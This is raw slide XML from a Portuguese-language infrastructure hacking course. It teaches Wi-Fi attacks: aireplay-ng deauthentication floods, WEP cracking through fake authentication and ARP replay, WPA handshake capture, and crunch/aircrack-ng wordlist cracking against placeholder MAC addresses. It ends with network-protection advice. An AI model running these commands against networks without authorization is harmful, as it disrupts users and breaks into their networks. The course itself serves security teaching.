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notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="256" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>
    <p:sldId id="284" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="283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ehda Rosenberg" initials="YR" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="3dd46d31939aa5f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7FD39-5F4C-4149-BDE5-DEF04FFF96F2}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>25/12/2020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8FFC9-F7BA-4953-B917-99DDD1E0CDB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30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E8FFC9-F7BA-4953-B917-99DDD1E0CDB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5781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251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652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103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0719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76" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3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Hacking de Infraestruturas - ITSafe Brasil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Shay </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1333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Alfasi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2404412" y="4512734"/>
            <a:ext cx="6858000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Curso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Hacking para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Infraestruturas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Alfasi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Tradu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ção: Luli Rosenberg &amp; Helton Wernik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031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772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4736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217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2457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98328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9067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9160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1601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80508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4149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0175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4600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76" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3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קורס פייתון בהייטק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Roman Zaikin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27112362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179288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5333" b="1" u="sng" baseline="0">
                <a:latin typeface="Ariel"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" u="none" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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5367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altLang="ko-KR" sz="3733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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168631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000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4991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694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27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681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185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06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hyperlink" Target="http://www.free-powerpoint-templates-design.com/free-powerpoint-templates-design" TargetMode="Externa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7747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12/25/2020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rgbClr val="09091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hlinkClick r:id="rId15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H</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR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acking de Infraestruturas - ITSafe Brasil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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-B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hay Alfasi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637" y="5405415"/>
            <a:ext cx="1854364" cy="110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37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561923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880" y="1"/>
            <a:ext cx="2219120" cy="131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16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B5C37-2E3E-4032-BD43-2E8A3EAD9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Desconectando redes ou usuários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8EE04AA-F6D7-45F3-B7E2-0443876D6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644198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> 100000 -a AA:BB:CC:11:22:33 -c DD:EE:FF:44:55:66 wlan0mon  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3597995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208686-8D01-4950-A877-7782F45A8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Invasão a redes com WEP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5C146CD-6808-4F85-8343-154499C03BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033806" y="1690688"/>
            <a:ext cx="1012438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WEP – Wired Equivalent Privacy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Criada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> no final dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>anos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> 90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Usa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tipo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>encripta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>ção</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> antigo chamado RC4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Quebrado muito facilmente através dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>IVs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> que contém apenas 24 bits e são enviados em forma de texto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>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0086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34A61C-A4CB-4242-8D28-D5B1B9CF0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6293"/>
            <a:ext cx="10719062" cy="1992231"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0"/>
              <a:t>Escrita de um arquivo com os </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>IVs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> AA:BB:CC:11:22:33 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> X --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>wep_basico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0"/>
              <a:t>Quebra da senha:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wep_basico-01.cap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1CBAD0E-E292-4F72-9EFD-08E20ED85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Invasão a redes com WEP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1547F7A-E4EE-462B-9C08-614CC3F9308D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1350813"/>
            <a:ext cx="57786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Quebrando a senha de redes com WEP</a:t>
            </a:r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D3840C4-CD17-4995-973F-C8780632BFC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952107" y="1979629"/>
            <a:ext cx="8210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Caso haja tráfego na rede, basta escrever num arquivo que chamaremos no exemplo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>wep_basico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8334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208686-8D01-4950-A877-7782F45A8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Invasão a redes com WEP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5C146CD-6808-4F85-8343-154499C03BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913614" y="2856864"/>
            <a:ext cx="10124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Falsificação de autenticação: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err="1"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>fakeauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> 0 -a AA:BB:CC:11:22:33 -h DD:EE:FF:44:55:66 wlan0mon  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B22CA67-7898-45ED-AAEF-F1EBB5CEEB35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913614" y="4001136"/>
            <a:ext cx="10124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Injeção de pacotes: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err="1"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>arpreplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> -b AA:BB:CC:11:22:33 -c DD:EE:FF:44:55:66 wlan0mon  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A985E13-3B87-4813-8A29-B7BC88475622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913614" y="1690688"/>
            <a:ext cx="96066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Nova escrita, dessa vez com o nome do comando usado na sequência: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err="1"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> AA:BB:CC:11:22:33 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> X --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>arpreplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p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0E9B5DA-E756-406F-8162-EC9446AE1F89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5167312"/>
            <a:ext cx="5297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err="1"/>
              <a:t>Querba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" dirty="0"/>
              <a:t> da senha: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aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> arp-replay-01.cap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0394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B6370A-18AF-42D5-8901-DFEBF787E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482633" cy="4351339"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> X --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> AA:BB:CC:11:22:33 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>arpreplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> –b AA:BB:CC:11:22:33 </a:t>
            </a:r>
          </a:p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71EE9B50-A889-4944-AEEC-CB96F5857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Invasão a redes com WEP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2816662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15FB07F-46CC-49FF-AC36-14A0DA30E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Invasão a redes com WPA/WPA2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D7DB920-CF7F-4C22-8E42-511BBB4021F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1611983"/>
            <a:ext cx="4535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WPA – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Proteceted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0"/>
              <a:t> Access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ABB44C5-A9F1-40D4-8579-E5B98B2E86CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941895" y="2341463"/>
            <a:ext cx="922962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A única diferença entre WPA e WPA2 é a encriptação usada para garantir a integridade dos dados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t>WPA – usa TKIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t>WPA2 – usa CCMP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Baseado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>princípio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>apertos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>mão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>já</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>vimos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tentar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>quebrar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>senha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>vamos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>capturar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>pacotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de handshake que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>são</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>enviados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>quando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>usuário</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>conecta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> à rede.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045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90954AB-037E-4FC2-AAC2-076568199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Invasão a redes com WPA/WPA2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DE81F11-C3E3-407C-9E35-07E23492D7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913614" y="3321525"/>
            <a:ext cx="96066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Desconectando o usuário por segundos para capturar os pacotes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>handshake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1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err="1"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> 5 -a AA:BB:CC:11:22:33 -c DD:EE:FF:44:55:66 wlan0mon  </a:t>
            </a:r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1D9FA4B-F5E3-4325-9BA9-5CE884F97694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913614" y="1690688"/>
            <a:ext cx="96066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Escreveremos um documento com os dados dos pacotes novamente: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err="1"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> AA:BB:CC:11:22:33 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> X --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>pacoteswpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> wlan0mon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7196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90954AB-037E-4FC2-AAC2-076568199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Invasão a redes com WPA/WPA2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DE81F11-C3E3-407C-9E35-07E23492D7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913614" y="1690688"/>
            <a:ext cx="960669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Criando uma lista de senhas possíveis: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err="1"/>
              <a:t>crunch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> 8 9 137br -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0" err="1"/>
              <a:t>listawpa</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2000" dirty="0"/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09B907D-B20A-4888-950A-B4CEA747A63B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913614" y="2987644"/>
            <a:ext cx="96066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Quebra da senha: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aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> pacoteswpa-01.cap -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>listawpa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7133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078AF8-642F-4205-A5C1-B1BF5F234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Tarefa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0C8197-5694-4E49-AC37-4E5345937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Quebre a senha do seu roteador com as técnicas usadas nos vídeos passados</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97247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F65851-2F90-4F98-A77F-FA74CF1CE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Como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proteger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nossa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rede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FA9345-F98A-4F3E-A5DE-283141BF6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Entrar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configurações</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>roteador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (com o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>computador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>conectado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roteador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> com um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cabo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de internet para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ataques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>desautenticação</a:t>
            </a:r>
            <a:r>
